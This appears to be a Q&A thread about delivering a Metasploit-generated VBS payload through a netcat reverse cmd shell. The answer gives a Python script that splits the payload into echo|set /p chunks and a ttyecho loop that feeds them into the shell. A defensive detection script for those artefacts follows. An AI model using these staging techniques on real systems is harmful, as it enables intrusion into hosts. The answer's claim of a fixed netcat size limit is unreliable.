How to send a long string in a netcat cmd shell?

Time: 2016-11-01 14:58:26

Tags: netcat

For a security test, a VBS script named msf.vbs is created to run a payload generated by Metasploit. For example:

root@sh:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.104] 1749
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop>cscript.exe %temp%\msf.vbs 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
cscript.exe %temp%\msf.vbs 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
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 823) (null): 0x800700C1

If the script is used in cmd.exe on localhost, everything works fine. But if it is used in a netcat cmd shell, the payload gets corrupted. For example:

  • Original payload size: 6160
  • Payload size after passing through netcat: 4068

My questions are:

  1. Why is the whole payload not transmitted?
  2. How do I send a long string in a netcat cmd shell?
  3. Crash demonstration


1 answer:

Answer 0 (score: 0)

Why is the whole payload not transmitted?

There is a size limit in NC that prohibits any transmission longer than 315 characters. Yours is 6,188.

How do I send a long string in a netcat cmd shell?

Split it up. The following Python script will do it for you (it is set up to break at 80 characters, which fits nicely and neatly into the terminal; credit for the script goes to: OS-18568), so the transmission works properly, and then rejoin the pieces in 123.hex by using an MS-DOS technique that echoes into the file several times onto a single line:

#!/usr/bin/env python3

import sys


def split_by_length(s, block_size):
    """Split s into consecutive chunks of at most block_size characters."""
    w = []
    n = len(s)
    for i in range(0, n, block_size):
        w.append(s[i:i + block_size])
    # drop a trailing chunk that is only whitespace
    if w and w[-1].isspace():
        del w[-1]
    return w


# usage: split.py <file with long echo lines>
with open(sys.argv[1]) as file:
    for line in file:
        line = line.rstrip('\n')
        # if line is longer than 80
        if len(line) > 80:
            # split line
            newlines = split_by_length(line, 80)
            # if a chunk starts with a space, put that space at the end of the previous chunk:
            # echo|set /p and <nul set /p strip leading spaces/tabs and equal signs
            for index, newline in enumerate(newlines):
                if index > 0 and newline.startswith(" "):
                    newlines[index - 1] = newlines[index - 1] + " "
            # rewrite lines
            for index, newline in enumerate(newlines):
                # 1st line: remove echo and create line with no carriage return
                if index == 0:
                    newline = newline.replace("echo ", "", 1)
                    newline = 'echo|set /p="' + newline + '"  >>123.hex'
                # last line: add echo
                elif index == len(newlines) - 1:
                    newline = "echo " + newline
                # middle lines: create line with no carriage return and add >> 123.hex
                else:
                    newline = 'echo|set /p="' + newline + '"  >>123.hex'
                print(newline)
        else:
            print(line)

A question you did not ask, but which will probably be the next one -

How do I feed these split pieces into the terminal that is running my reverse shell?

You need the following application: ttyecho, found here: https://github.com/buglessdr/ttyecho

Then, once that is done, you can run the following small bash script to tie it all together:

while read -r line; do /git/ttyecho/ttyecho -n /dev/pts/0 "$line"; done < commandsplit.txt

Tip - to find out which terminal holds the session, you can use the following command:

tty
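A defender-side counterpart to the two artefacts this thread leaves on the target, added here as an example and not code from the question or the answer: it scans process command-line records for repeated `echo|set /p="..." >>file` appends to one file (the chunked no-newline write the script above emits) and for cscript/wscript being launched on a file under a temp directory. The sample command lines are constructed, and the three-chunk threshold and the temp-directory patterns are assumptions.

```python
import re
from collections import Counter

# Constructed sample process command lines (not real telemetry).
SAMPLE_CMDLINES = [
    'cmd.exe /c echo|set /p="4D5A90000300000004000000FFFF0000" >>123.hex',
    'cmd.exe /c echo|set /p="B8000000000000004000000000000000" >>123.hex',
    'cmd.exe /c echo|set /p="00000000000000000000000000000000" >>123.hex',
    'cmd.exe /c echo 000000000000000000000000000000E8 >>123.hex',
    'cscript.exe %temp%\\msf.vbs',
    'cmd.exe /c echo done >>notes.txt',
]

# "echo|set /p=" (or "<nul set /p=") writes without a trailing newline; the
# ">>target" append is what stitches the chunks into one line of that file.
SET_P_APPEND = re.compile(r'set\s+/p\s*=?.*?>>\s*"?([^\s"]+)', re.IGNORECASE)

# Script host launched on a file under a temp directory (assumed patterns).
TEMP_SCRIPT = re.compile(
    r'\b[cw]script(?:\.exe)?\s+.*?(%temp%|\\temp\\|\\tmp\\)', re.IGNORECASE)


def analyse(cmdlines, min_chunks=3):
    """Return (rule, detail) findings for a sequence of command lines."""
    findings = []
    appends = Counter()          # target file -> number of set /p appends
    for line in cmdlines:
        m = SET_P_APPEND.search(line)
        if m:
            appends[m.group(1).lower()] += 1
        if TEMP_SCRIPT.search(line):
            findings.append(("script_host_from_temp", line))
    for target, n in appends.items():
        if n >= min_chunks:
            findings.append(("chunked_no_newline_write",
                             f"{target} ({n} set /p appends)"))
    return findings


if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_CMDLINES):
        print(rule, "->", detail)
```

A single `set /p` append is ordinary batch usage; the signal is many appends to the same file in a short window, so in a real pipeline the counter should be keyed per host and per session as well as per file.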